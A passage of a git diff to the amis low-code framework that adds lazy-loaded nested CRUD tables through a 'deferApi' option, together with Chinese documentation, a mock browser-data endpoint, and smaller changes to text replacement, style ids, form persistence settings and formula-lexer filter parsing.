diff --git a/docs/zh-CN/components/crud.md b/docs/zh-CN/components/crud.md index d6b2561da..b6ab5a436 100755 --- a/docs/zh-CN/components/crud.md +++ b/docs/zh-CN/components/crud.md @@ -200,11 +200,11 @@ CRUD 组件对数据源接口的数据结构要求如下: | orderDir | 'asc'/'desc' | 排序方式 | | keywords | string | 搜索关键字 | -### 解析Query原始类型 +### 解析 Query 原始类型 > `3.5.0`及以上版本 -`syncLocation`开启后,CRUD在初始化数据域时,将会对url中的Query进行转换,将原始类型的字符串格式的转化为同位类型,目前仅支持**布尔类型** +`syncLocation`开启后,CRUD 在初始化数据域时,将会对 url 中的 Query 进行转换,将原始类型的字符串格式的转化为同位类型,目前仅支持**布尔类型** ``` "true" ==> true @@ -213,7 +213,6 @@ CRUD 组件对数据源接口的数据结构要求如下: 如果只想保持字符串格式,可以设置`"parsePrimitiveQuery": false`关闭该特性,具体效果参考[示例](../../../examples/crud/parse-primitive-query)。 - ## 功能 既然这个渲染器叫增删改查,那接下来分开介绍这几个功能吧。 @@ -584,6 +583,61 @@ Cards 模式支持 [Cards](./cards) 中的所有功能。 } ``` +## 嵌套 + +当行数据中存在 `children` 字段时,CRUD 会自动识别为树形数据,并支持展开收起。 + +```schema: scope="body" +{ + "type": "crud", + "name": "crud", + "syncLocation": false, + "api": "/api/mock2/crud/table2", + "columns": [ + { + "name": "id", + "label": "ID" + }, + { + "name": "engine", + "label": "Rendering engine" + }, + { + "name": "browser", + "label": "Browser" + } + ] +} +``` + +## 嵌套懒加载 + +如果数据量比较大不适合一次性加载,可以配置 `deferApi` 接口,结合行数据中标记 `defer: true` 属性,实现懒加载。 + +```schema: scope="body" +{ + "type": "crud", + "name": "crud", + "syncLocation": false, + "api": "/api/mock2/crud/table6", + "deferApi": "/api/mock2/crud/table6?parentId=${id}", + "columns": [ + { + "name": "id", + "label": "ID" + }, + { + "name": "engine", + "label": "Rendering engine" + }, + { + "name": "browser", + "label": "Browser" + } + ] +} +``` + ## 查询条件表单 大部分表格展示有对数据进行检索的需求,CRUD 自身支持通过配置`filter`,实现查询条件过滤表单。`filter` 配置实际上同 [Form](./form/index) 组件,因此支持绝大部分`form`的功能。 @@ -3173,6 +3227,7 @@ itemAction 里的 onClick 还能通过 `data` 参数拿到当前行的数据, | title | `string` | `""` | 可设置成空,当设置成空时,没有标题栏 | | className | `string` | | 表格外层 Dom 的类名 | | api | [API](../../docs/types/api) | | CRUD 用来获取列表数据的 api。 | +| deferApi | [API](../../docs/types/api) | | 当行数据中有 defer 属性时,用此接口进一步加载内容 | | loadDataOnce | `boolean` | | 是否一次性加载所有数据(前端分页) | | loadDataOnceFetchOnFilter | `boolean` | `true` | 在开启 loadDataOnce 时,filter 时是否去重新请求 api | | source | `string` | | 数据映射接口返回某字段的值,不设置会默认使用接口返回的`${items}`或者`${rows}`,也可以设置成上层数据源的内容 | diff --git a/docs/zh-CN/components/table.md b/docs/zh-CN/components/table.md index 0efccd914..1667515df 100755 --- a/docs/zh-CN/components/table.md +++ b/docs/zh-CN/components/table.md @@ -1825,6 +1825,7 @@ popOver 的其它配置请参考 [popover](./popover) | type | `string` | | `"type"` 指定为 table 渲染器 | | | title | `string` | | 标题 | | | source | `string` | `${items}` | 数据源, 绑定当前环境变量 | | +| deferApi | [API](../../docs/types/api) | | 当行数据中有 defer 属性时,用此接口进一步加载内容 | | affixHeader | `boolean` | `true` | 是否固定表头 | | | columnsTogglable | `auto` 或者 `boolean` | `auto` | 展示列显示开关, 自动即:列数量大于或等于 5 个时自动开启 | | | placeholder | `string` 或者 `SchemaTpl` | `暂无数据` | 当没数据的时候的文字提示 | | diff --git a/docs/zh-CN/start/getting-started.md b/docs/zh-CN/start/getting-started.md index 6d5d21414..9fac584e3 100644 --- a/docs/zh-CN/start/getting-started.md +++ b/docs/zh-CN/start/getting-started.md @@ -157,6 +157,7 @@ let amisScoped = amis.embed( // requestAdaptor(api) { // // 支持异步,可以通过 api.mockResponse 来设置返回结果,跳过真正的请求发送 // // 此功能自定义 fetcher 的话会失效 + // // api.context 中包含发送请求前的上下文信息 // return api; // } // @@ -758,8 +759,7 @@ let amisScoped = amis.embed( { replaceText: { service: 'http://localhost' - }, - replaceTextKeys: ['api'] + } } ); ``` @@ -778,6 +778,29 @@ type, name, mode, target, reload 如果发现有字段被意外替换了,可以通过设置这个属性来避免 +通过字符串数组或者函数来过滤字段,比如: + +```javascript +let amisScoped = amis.embed( + '#root', + { + type: 'page', + body: { + type: 'service', + api: 'service/api' + } + }, + {}, + { + replaceText: { + service: 'http://localhost' + }, + // replaceTextIgnoreKeys: ['api'], + replaceTextIgnoreKeys: key => key === 'api' + } +); +``` + #### toastPosition Toast 提示弹出位置,默认为`'top-center'`。 diff --git a/docs/zh-CN/types/api.md b/docs/zh-CN/types/api.md index de89f2ecf..e806d3fa8 100755 --- a/docs/zh-CN/types/api.md +++ b/docs/zh-CN/types/api.md @@ -591,6 +591,7 @@ amis 的 API 配置,如果无法配置出你想要的请求结构,那么可 - method:当前请求的方式 - data:请求的数据体 - headers:请求的头部信息 + - context: 发送请求时的上下文数据 - **context** 发送请求时的上下文数据 ##### 字符串形式 diff --git a/examples/components/CRUD/Nested.jsx b/examples/components/CRUD/Nested.jsx index 3cbbb96c1..83f40fdf2 100644 --- a/examples/components/CRUD/Nested.jsx +++ b/examples/components/CRUD/Nested.jsx @@ -2,11 +2,9 @@ export default { title: '支持多层嵌套,列数据中有 children 字段即可。(建议不超过10层)', body: { type: 'crud', - api: '/api/mock2/crud/table2', + api: '/api/mock2/crud/table6', + deferApi: '/api/mock2/crud/table6?parentId=${id}', saveOrderApi: '/api/mock2/form/saveData', - expandConfig: { - expand: 'all' - }, draggable: true, columns: [ { diff --git a/mock/cfc/mock/crud/table6.js b/mock/cfc/mock/crud/table6.js new file mode 100644 index 000000000..ed198eddf --- /dev/null +++ b/mock/cfc/mock/crud/table6.js @@ -0,0 +1,527 @@ +function findInTree(tree, id) { + let ret = null; + tree.some(function (item) { + if (item.id == id) { + ret = item; + return true; + } + if (item.children) { + ret = findInTree(item.children, id); + return !!ret; + } + }); + return ret; +} + +module.exports = function (req, res) { + const perPage = 10; + const page = req.query.page || 1; + let items = data.concat(); + if (req.query.parentId) { + const item = findInTree(items, req.query.parentId); + + if (!item) { + res.json({ + status: 404, + msg: 'Not Found' + }); + return; + } + + res.json({ + status: 0, + msg: 'ok', + data: { + ...item, + children: Array.isArray(item.children) + ? item.children.map(item => ({ + ...item, + children: undefined, + defer: !!(Array.isArray(item.children) && item.children.length) + })) + : [] + } + }); + return; + } + const ret = { + status: 0, + msg: 'ok', + data: { + count: items.length, + rows: items + .concat() + .splice((page - 1) * perPage, perPage) + .map(item => ({ + ...item, + children: undefined, + defer: !!(Array.isArray(item.children) && item.children.length) + })) + } + }; + res.json(ret); +}; + +module.exports.cache = true; +const data = [ + { + engine: 'Trident', + browser: 'Internet Explorer 4.0', + platform: 'Win 95+', + version: '4', + grade: 'X' + }, + { + engine: 'Trident', + browser: 'Internet Explorer 5.0', + platform: 'Win 95+', + version: '5', + grade: 'C' + }, + { + engine: 'Trident', + browser: 'Internet Explorer 5.5', + platform: 'Win 95+', + version: '5.5', + grade: 'A' + }, + { + engine: 'Trident', + browser: 'Internet Explorer 6', + platform: 'Win 98+', + version: '6', + grade: 'A' + }, + { + engine: 'Trident', + browser: 'Internet Explorer 7', + platform: 'Win XP SP2+', + version: '7', + grade: 'A' + }, + { + engine: 'Trident', + browser: 'AOL browser (AOL desktop)', + platform: 'Win XP', + version: '6', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Firefox 1.0', + platform: 'Win 98+ / OSX.2+', + version: '1.7', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Firefox 1.5', + platform: 'Win 98+ / OSX.2+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Firefox 2.0', + platform: 'Win 98+ / OSX.2+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Firefox 3.0', + platform: 'Win 2k+ / OSX.3+', + version: '1.9', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Camino 1.0', + platform: 'OSX.2+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Camino 1.5', + platform: 'OSX.3+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Netscape 7.2', + platform: 'Win 95+ / Mac OS 8.6-9.2', + version: '1.7', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Netscape Browser 8', + platform: 'Win 98SE+', + version: '1.7', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Netscape Navigator 9', + platform: 'Win 98+ / OSX.2+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.0', + platform: 'Win 95+ / OSX.1+', + version: '1', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.1', + platform: 'Win 95+ / OSX.1+', + version: '1.1', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.2', + platform: 'Win 95+ / OSX.1+', + version: '1.2', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.3', + platform: 'Win 95+ / OSX.1+', + version: '1.3', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.4', + platform: 'Win 95+ / OSX.1+', + version: '1.4', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.5', + platform: 'Win 95+ / OSX.1+', + version: '1.5', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.6', + platform: 'Win 95+ / OSX.1+', + version: '1.6', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.7', + platform: 'Win 98+ / OSX.1+', + version: '1.7', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.8', + platform: 'Win 98+ / OSX.1+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Seamonkey 1.1', + platform: 'Win 98+ / OSX.2+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Epiphany 2.20', + platform: 'Gnome', + version: '1.8', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'Safari 1.2', + platform: 'OSX.3', + version: '125.5', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'Safari 1.3', + platform: 'OSX.3', + version: '312.8', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'Safari 2.0', + platform: 'OSX.4+', + version: '419.3', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'Safari 3.0', + platform: 'OSX.4+', + version: '522.1', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'OmniWeb 5.5', + platform: 'OSX.4+', + version: '420', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'iPod Touch / iPhone', + platform: 'iPod', + version: '420.1', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'S60', + platform: 'S60', + version: '413', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 7.0', + platform: 'Win 95+ / OSX.1+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 7.5', + platform: 'Win 95+ / OSX.2+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 8.0', + platform: 'Win 95+ / OSX.2+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 8.5', + platform: 'Win 95+ / OSX.2+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 9.0', + platform: 'Win 95+ / OSX.3+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 9.2', + platform: 'Win 88+ / OSX.3+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 9.5', + platform: 'Win 88+ / OSX.3+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera for Wii', + platform: 'Wii', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Nokia N800', + platform: 'N800', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Nintendo DS browser', + platform: 'Nintendo DS', + version: '8.5', + grade: 'C' + }, + { + engine: 'KHTML', + browser: 'Konqureror 3.1', + platform: 'KDE 3.1', + version: '3.1', + grade: 'C' + }, + { + engine: 'KHTML', + browser: 'Konqureror 3.3', + platform: 'KDE 3.3', + version: '3.3', + grade: 'A' + }, + { + engine: 'KHTML', + browser: 'Konqureror 3.5', + platform: 'KDE 3.5', + version: '3.5', + grade: 'A' + }, + { + engine: 'Tasman', + browser: 'Internet Explorer 4.5', + platform: 'Mac OS 8-9', + version: '-', + grade: 'X' + }, + { + engine: 'Tasman', + browser: 'Internet Explorer 5.1', + platform: 'Mac OS 7.6-9', + version: '1', + grade: 'C' + }, + { + engine: 'Tasman', + browser: 'Internet Explorer 5.2', + platform: 'Mac OS 8-X', + version: '1', + grade: 'C' + }, + { + engine: 'Misc', + browser: 'NetFront 3.1', + platform: 'Embedded devices', + version: '-', + grade: 'C' + }, + { + engine: 'Misc', + browser: 'NetFront 3.4', + platform: 'Embedded devices', + version: '-', + grade: 'A' + }, + { + engine: 'Misc', + browser: 'Dillo 0.8', + platform: 'Embedded devices', + version: '-', + grade: 'X' + }, + { + engine: 'Misc', + browser: 'Links', + platform: 'Text only', + version: '-', + grade: 'X' + }, + { + engine: 'Misc', + browser: 'Lynx', + platform: 'Text only', + version: '-', + grade: 'X' + }, + { + engine: 'Misc', + browser: 'IE Mobile', + platform: 'Windows Mobile 6', + version: '-', + grade: 'C' + }, + { + engine: 'Misc', + browser: 'PSP browser', + platform: 'PSP', + version: '-', + grade: 'C' + }, + { + engine: 'Other browsers', + browser: 'All others', + platform: '-', + version: '-', + grade: 'U' + } +].map(function (item, index) { + return Object.assign({}, item, { + id: index + 1, + children: + Math.random() > 0.5 + ? undefined + : [ + { + engine: 'Trident', + browser: 'Internet Explorer 4.0', + platform: 'Win 95+', + version: '4', + grade: 'X' + }, + { + engine: 'Trident', + browser: 'Internet Explorer 5.0', + platform: 'Win 95+', + version: '5', + grade: 'C' + }, + { + engine: 'Other browsers', + browser: 'All others', + platform: '-', + version: '-', + grade: 'U' + } + ].map(function (child, i) { + return Object.assign({}, child, { + id: (index + 1) * 100 + i + 1, + children: [ + { + engine: 'Trident', + browser: 'Internet Explorer 4.0', + platform: 'Win 95+', + version: '4', + grade: 'X' + }, + { + engine: 'Misc', + browser: 'Internet Explorer 5.0', + platform: 'Win 95+', + version: '5', + grade: 'C' + }, + { + engine: 'Misc', + browser: 'Internet Explorer 5.0', + platform: 'Win 95+', + version: '1', + grade: 'A' + } + ].map(function (child, i) { + return Object.assign({}, child, { + id: (i + 1) * 100 + (index + 1) * 1000 + i + 1 + }); + }) + }); + }) + }); +}); diff --git a/mock/cfc/mock/index.js b/mock/cfc/mock/index.js index a73d865ce..9b8fe1c3d 100755 --- a/mock/cfc/mock/index.js +++ b/mock/cfc/mock/index.js @@ -27,15 +27,20 @@ module.exports = function (req, res) { return require(file)(req, res); } else if (exist(jsFile)) { let file = require.resolve(path.join(DIRNAME, jsFile)); - delete require.cache[file]; + let mod = require(file); + + if (!mod.cache) { + delete require.cache[file]; + mod = require(file); + } if (req.query.waitSeconds) { return setTimeout(function () { - require(file)(req, res); + mod(req, res); }, parseInt(req.query.waitSeconds, 10) * 1000); } - return require(file)(req, res); + return mod(req, res); } if (exist(jsonFile)) { if (req.query.waitSeconds) { diff --git a/packages/amis-core/package.json b/packages/amis-core/package.json index a5b5d4ca5..e8834b56e 100644 --- a/packages/amis-core/package.json +++ b/packages/amis-core/package.json @@ -61,7 +61,8 @@ "react-intersection-observer": "9.5.2", "react-json-view": "1.21.3", "tslib": "^2.3.1", - "uncontrollable": "7.2.1" + "uncontrollable": "7.2.1", + "path-to-regexp": "6.2.0" }, "peerDependencies": { "amis-formula": "*", diff --git a/packages/amis-core/src/env.tsx b/packages/amis-core/src/env.tsx index e63b9c289..830f41098 100644 --- a/packages/amis-core/src/env.tsx +++ b/packages/amis-core/src/env.tsx @@ -131,7 +131,9 @@ export interface RendererEnv { /** * 文本替换的黑名单,因为属性太多了所以改成黑名单的 flags */ - replaceTextIgnoreKeys?: String[]; + replaceTextIgnoreKeys?: + | String[] + | ((key: string, value: any, object: any) => boolean); /** * 解析url参数 diff --git a/packages/amis-core/src/store/table.ts b/packages/amis-core/src/store/table.ts index e1f3db6a3..42b354875 100644 --- a/packages/amis-core/src/store/table.ts +++ b/packages/amis-core/src/store/table.ts @@ -39,6 +39,45 @@ import {getStoreById} from './manager'; */ const PARTITION_INDEX = 3; +function initChildren( + children: Array<any>, + depth: number, + pindex: number, + parentId: string, + path: string = '' +): any { + depth += 1; + return children.map((item, index) => { + item = isObject(item) + ? item + : { + item + }; + const id = item.__id ?? guid(); + + return { + // id: String(item && (item as any)[self.primaryField] || `${pindex}-${depth}-${key}`), + id: String(id), + parentId: String(parentId), + key: String(`${pindex}-${depth}-${index}`), + path: `${path}${index}`, + depth: depth, + index: index, + newIndex: index, + pristine: item, + data: item, + defer: !!item.defer, + loaded: false, + loading: false, + rowSpans: {}, + children: + item && Array.isArray(item.children) + ? initChildren(item.children, depth, index, id, `${path}${index}.`) + : [] + }; + }); +} + export const Column = types .model('Column', { label: types.optional(types.frozen(), undefined), @@ -127,20 +166,33 @@ export const Row = types rowSpans: types.frozen({} as any), index: types.number, newIndex: types.number, - nth: 0, path: '', // 行数据的位置 - expandable: false, checkdisable: false, isHover: false, children: types.optional( types.array(types.late((): IAnyModelType => Row)), [] ), + defer: false, // 是否为懒数据 + loaded: false, // 懒数据是否加载完了 + loading: false, // 懒数据是否正在加载 + error: '', // 懒数据加载失败的错误信息 depth: types.number, // 当前children位于第几层,便于使用getParent获取最顶层TableStore appeared: true, lazyRender: false }) .views(self => ({ + get expandable(): boolean { + let table: any; + return !!( + (self && self.children.length) || + (self && self.defer && !self.loaded) || + ((table = getParent(self, self.depth * 2) as any) && + table.footable && + table.footableColumns.length) + ); + }, + get checked(): boolean { return (getParent(self, self.depth * 2) as ITableStore).isSelected( self as IRow @@ -320,36 +372,70 @@ export const Row = types }); if (Array.isArray(data.children)) { - const arr = data.children; - const pool = arr.concat(); + this.replaceChildren(data.children); + } + }, - // 把多的删了先 - if (self.children.length > arr.length) { - self.children.splice(arr.length, self.children.length - arr.length); - } + replaceChildren(children: Array<any>) { + const arr = children; + const pool = arr.concat(); - let index = 0; - const len = self.children.length; - while (pool.length) { - // 因为父级id未更新,所以需要将子级的parentId正确指向父级id - const item = { - ...pool.shift(), - parentId: self.id - }!; - - if (index < len) { - self.children[index].replaceWith(item); - } else { - const row = Row.create(item); - self.children.push(row); - } - index++; + // 把多的删了先 + if (self.children.length > arr.length) { + self.children.splice(arr.length, self.children.length - arr.length); + } + + let index = 0; + const len = self.children.length; + while (pool.length) { + // 因为父级id未更新,所以需要将子级的parentId正确指向父级id + const item = { + ...pool.shift(), + parentId: self.id + }!; + + if (index < len) { + self.children[index].replaceWith(item); + } else { + const row = Row.create(item); + self.children.push(row); } + index++; } }, markAppeared(value: any) { value && (self.appeared = !!value); + }, + + markLoading(value: any) { + self.loading = !!value; + }, + + markLoaded(value: any) { + self.loaded = !!value; + }, + + setError(value: any) { + self.error = String(value); + }, + + resetDefered() { + self.error = ''; + self.loaded = false; + }, + + setDeferData({children, ...rest}: any) { + self.data = { + ...self.data, + ...rest + }; + + if (Array.isArray(children)) { + this.replaceChildren( + initChildren(children, self.depth, self.index, self.id, self.path) + ); + } } })); @@ -1238,55 +1324,6 @@ export const TableStore = iRendererStore return combineCell(arr, keys); } - function initChildren( - children: Array<any>, - depth: number, - pindex: number, - parentId: string, - path: string = '', - nThRef: {index: number} - ): any { - depth += 1; - return children.map((item, index) => { - item = isObject(item) - ? item - : { - item - }; - const id = item.__id ?? guid(); - - return { - // id: String(item && (item as any)[self.primaryField] || `${pindex}-${depth}-${key}`), - id: String(id), - parentId: String(parentId), - key: String(`${pindex}-${depth}-${index}`), - path: `${path}${index}`, - depth: depth, - index: index, - nth: nThRef.index++, - newIndex: index, - pristine: item, - data: item, - rowSpans: {}, - children: - item && Array.isArray(item.children) - ? initChildren( - item.children, - depth, - index, - id, - `${path}${index}.`, - nThRef - ) - : [], - expandable: !!( - (item && Array.isArray(item.children) && item.children.length) || - (self.footable && self.footableColumns.length) - ) - }; - }); - } - function initRows( rows: Array<any>, getEntryId?: (entry: any, index: number) => string, @@ -1298,7 +1335,6 @@ export const TableStore = iRendererStore /* 避免输入内容为非数组挂掉 */ rows = !Array.isArray(rows) ? [] : rows; - const nThRef = {index: 0}; let arr: Array<SRow> = rows.map((item, index) => { if (!isObject(item)) { item = { @@ -1315,20 +1351,18 @@ export const TableStore = iRendererStore key: String(`${index}-1-${index}`), depth: 1, // 最大父节点默认为第一层,逐层叠加 index: index, - nth: nThRef.index++, newIndex: index, pristine: item, path: `${index}`, data: item, rowSpans: {}, + defer: !!item.defer, + loaded: false, + loading: false, children: item && Array.isArray(item.children) - ? initChildren(item.children, 1, index, id, `${index}.`, nThRef) - : [], - expandable: !!( - (item && Array.isArray(item.children) && item.children.length) || - (self.footable && self.footableColumns.length) - ) + ? initChildren(item.children, 1, index, id, `${index}.`) + : [] }; }); @@ -1342,7 +1376,9 @@ export const TableStore = iRendererStore } replaceRow(arr, reUseRow); - self.isNested = self.rows.some(item => item.children.length); + self.isNested = self.rows.some( + item => item.children.length || (item.defer && !item.loaded) + ); // 前 20 个直接渲染,后面的按需渲染 if ( diff --git a/packages/amis-core/src/types.ts b/packages/amis-core/src/types.ts index 0133ae7d9..683a4406c 100644 --- a/packages/amis-core/src/types.ts +++ b/packages/amis-core/src/types.ts @@ -228,6 +228,11 @@ export interface ApiObject extends BaseApiObject { api: ApiObject, context: any ) => ApiObject | Promise<ApiObject>; + /** + * api 发送上下文,可以用来传递一些数据给 api 的 adaptor + * @readonly + */ + context?: any; /** 是否过滤为空字符串的 query 参数 */ filterEmptyQuery?: boolean; downloadFileName?: string; diff --git a/packages/amis-core/src/utils/api.ts b/packages/amis-core/src/utils/api.ts index bfea52cc4..e3f7004b8 100644 --- a/packages/amis-core/src/utils/api.ts +++ b/packages/amis-core/src/utils/api.ts @@ -478,6 +478,7 @@ export function wrapFetcher( options?: object ) { api = buildApi(api, data, options) as ApiObject; + (api as ApiObject).context = data; if (api.requestAdaptor) { debug('api', 'before requestAdaptor', api); diff --git a/packages/amis-core/src/utils/replaceText.ts b/packages/amis-core/src/utils/replaceText.ts index 42c3e6925..2b5c630c2 100644 --- a/packages/amis-core/src/utils/replaceText.ts +++ b/packages/amis-core/src/utils/replaceText.ts @@ -7,20 +7,31 @@ import {isObject, JSONTraverse} from './helper'; export function replaceText( schema: any, replaceText?: {[propName: string]: string}, - replaceTextIgnoreKeys?: String[] + replaceTextIgnoreKeys?: + | String[] + | ((key: string, value: any, object: any) => boolean) ) { // 进行文本替换 if (replaceText && isObject(replaceText)) { let replicaSchema = cloneDeep(schema); const replaceKeys = Object.keys(replaceText); replaceKeys.sort((a, b) => b.length - a.length); // 避免用户将短的放前面 - const IgnoreKeys = new Set(replaceTextIgnoreKeys || []); + const IgnoreKeys = new Set( + Array.isArray(replaceTextIgnoreKeys) ? replaceTextIgnoreKeys : [] + ); + const ignore = + typeof replaceTextIgnoreKeys === 'function' + ? replaceTextIgnoreKeys + : (key: string) => { + return IgnoreKeys.has(key); + }; + JSONTraverse(replicaSchema, (value: any, key: string, object: any) => { const descriptor = Object.getOwnPropertyDescriptor(object, key); if ( typeof value === 'string' && - !IgnoreKeys.has(key) && - descriptor?.writable + descriptor?.writable && + !ignore(key, value, object) ) { for (const replaceKey of replaceKeys) { if (~value.indexOf(replaceKey)) { diff --git a/packages/amis-core/src/utils/style-helper.ts b/packages/amis-core/src/utils/style-helper.ts index 10969f1b1..476171f7c 100644 --- a/packages/amis-core/src/utils/style-helper.ts +++ b/packages/amis-core/src/utils/style-helper.ts @@ -56,7 +56,7 @@ export function findOrCreateStyle(id: string, doc?: Document) { } export function insertStyle(style: string, id: string, doc?: Document) { - const varStyleTag = findOrCreateStyle(id, doc); + const varStyleTag = findOrCreateStyle('amis-' + id, doc); // bca-disable-line varStyleTag.innerHTML = style; @@ -348,7 +348,7 @@ export interface InsertCustomStyle { */ export function removeCustomStyle(type: string, id: string, doc?: Document) { const style = (doc || document).getElementById( - (type ? type + '-' : '') + id.replace('u:', '') + 'amis-' + (type ? type + '-' : '') + id.replace('u:', '') ); if (style) { style.remove(); diff --git a/packages/amis-editor/src/plugin/Form/Form.tsx b/packages/amis-editor/src/plugin/Form/Form.tsx index 1c8e0d49e..ddf531ec2 100644 --- a/packages/amis-editor/src/plugin/Form/Form.tsx +++ b/packages/amis-editor/src/plugin/Form/Form.tsx @@ -1,7 +1,7 @@ import cx from 'classnames'; import flatten from 'lodash/flatten'; import cloneDeep from 'lodash/cloneDeep'; -import {isObject} from 'amis-core'; +import {isObject, getRendererByName} from 'amis-core'; import { BasePlugin, tipedLabel, @@ -783,29 +783,61 @@ export class FormPlugin extends BasePlugin { '设置后将让表单的第一个可输入的表单项获得焦点' ) }), - { - type: 'ae-switch-more', - mode: 'normal', + getSchemaTpl('switch', { name: 'persistData', label: tipedLabel( '本地缓存', '开启后,表单的数据会缓存在浏览器中,切换页面或关闭弹框不会清空当前表单内的数据' ), - hiddenOnDefault: true, - formType: 'extend', - form: { - body: [ - getSchemaTpl('switch', { - name: 'clearPersistDataAfterSubmit', - label: tipedLabel( - '提交成功后清空缓存', - '开启本地缓存并开启本配置项后,表单提交成功后,会自动清除浏览器中当前表单的缓存数据' - ), - pipeIn: defaultValue(false), - visibleOn: 'data.persistData' - }) - ] - } + pipeIn: (value: boolean | string | undefined) => !!value + }), + { + type: 'container', + className: 'ae-ExtendMore mb-3', + visibleOn: 'data.persistData', + body: [ + getSchemaTpl('tplFormulaControl', { + name: 'persistData', + label: tipedLabel( + '持久化Key', + '使用静态数据或者变量:<code>"\\${id}"</code>,来为Form指定唯一的Key' + ), + pipeIn: (value: boolean | string | undefined) => + typeof value === 'string' ? value : '' + }), + { + type: 'input-array', + label: tipedLabel( + '保留字段集合', + '如果只需要保存Form中的部分字段值,请配置需要保存的字段名称集合,留空则保留全部字段' + ), + name: 'persistDataKeys', + items: { + type: 'input-text', + placeholder: '请输入字段名', + options: flatten(schema?.body ?? schema?.controls ?? []) + .map((item: Record<string, any>) => { + const isFormItem = getRendererByName( + item?.type + )?.isFormItem; + + return isFormItem && typeof item?.name === 'string' + ? {label: item.name, value: item.name} + : false; + }) + .filter(Boolean) + }, + itemClassName: 'bg-transparent' + }, + getSchemaTpl('switch', { + name: 'clearPersistDataAfterSubmit', + label: tipedLabel( + '提交成功后清空缓存', + '开启本地缓存并开启本配置项后,表单提交成功后,会自动清除浏览器中当前表单的缓存数据' + ), + pipeIn: defaultValue(false) + }) + ] }, getSchemaTpl('switch', { name: 'canAccessSuperData', diff --git a/packages/amis-editor/src/plugin/Form/InputDate.tsx b/packages/amis-editor/src/plugin/Form/InputDate.tsx index 8c56e150c..62c80d2a5 100644 --- a/packages/amis-editor/src/plugin/Form/InputDate.tsx +++ b/packages/amis-editor/src/plugin/Form/InputDate.tsx @@ -293,7 +293,7 @@ export class DateControlPlugin extends BasePlugin { form.setValues({ placeholder: DateType[type]?.placeholder, - valueFormat: type === 'time' ? 'HH:mm' : 'X', + valueFormat: 'X', displayFormat: DateType[type]?.format, minDate: '', maxDate: '', @@ -308,7 +308,7 @@ export class DateControlPlugin extends BasePlugin { '值格式', '提交数据前将根据设定格式化数据,请参考 <a href="https://momentjs.com/" target="_blank">moment</a> 中的格式用法。' ), - pipeIn: defaultValue('YYYY-MM-DD'), + pipeIn: defaultValue('X'), clearable: true, onChange: ( value: string, diff --git a/packages/amis-formula/src/lexer.ts b/packages/amis-formula/src/lexer.ts index c48b878c4..18a5288ae 100644 --- a/packages/amis-formula/src/lexer.ts +++ b/packages/amis-formula/src/lexer.ts @@ -1,3 +1,4 @@ +import {getFilters} from './filter'; import {LexerOptions, Token, TokenTypeName} from './types'; export const enum TokenEnum { @@ -171,16 +172,25 @@ function formatNumber(value: string) { return Number(value); } -export function lexer(input: string, options?: LexerOptions) { +export function lexer(input: string, options: LexerOptions = {}) { let line = 1; let column = 1; let index = 0; let mainState = mainStates.START; const states: Array<any> = [mainState]; let tokenCache: Array<Token> = []; - const allowFilter = options?.allowFilter !== false; + options = {...options}; + const allowFilter = options.allowFilter !== false; - if (options?.evalMode || options?.variableMode) { + if (!options.isFilter) { + const filterKeys = Object.keys(getFilters()); + if ((options as any).filters) { + filterKeys.push(...Object.keys((options as any).filters)); + } + options.isFilter = (name: string) => filterKeys.includes(name); + } + + if (options.evalMode || options.variableMode) { pushState(mainStates.EXPRESSION); } @@ -370,6 +380,16 @@ export function lexer(input: string, options?: LexerOptions) { token.value === '|' && allowFilter ) { + // 怎么区分是过滤还是位运算呢? + // 靠外面反馈吧 + if (options?.isFilter) { + const restInput = input.substring(token.start.index + 1).trim(); + const m = /^[A-Za-z0-9_$@][A-Za-z0-9_\-$@]*/.exec(restInput); + if (!m || !options.isFilter(m[0])) { + return token; + } + } + pushState(mainStates.Filter); return { type: TokenName[TokenEnum.OpenFilter], diff --git a/packages/amis-formula/src/types.ts b/packages/amis-formula/src/types.ts index 39c967bff..a675707ff 100644 --- a/packages/amis-formula/src/types.ts +++ b/packages/amis-formula/src/types.ts @@ -61,6 +61,8 @@ export interface LexerOptions { * ${abc | html} */ allowFilter?: boolean; + + isFilter?: (name: string) => boolean; } export type TokenTypeName = diff --git a/packages/amis-ui/scss/components/_image-gallery.scss 